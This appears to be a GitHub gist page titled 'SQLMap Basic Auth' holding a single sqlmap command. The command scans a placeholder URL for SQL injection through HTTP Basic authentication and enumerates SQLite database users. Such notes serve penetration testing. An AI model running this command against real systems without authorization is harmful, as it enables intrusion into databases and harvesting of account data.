Created
December 10, 2019 09:44
-
-
Save hoodoer/013d275589681488165452020d8d2a97 to your computer and use it in GitHub Desktop.
SQLMap Basic Auth
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sqlmap --users --keep-alive --dbms=sqlite --headers="Authorization: Basic BASICAUTHBASE64" -u http://SOMEURL.com |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment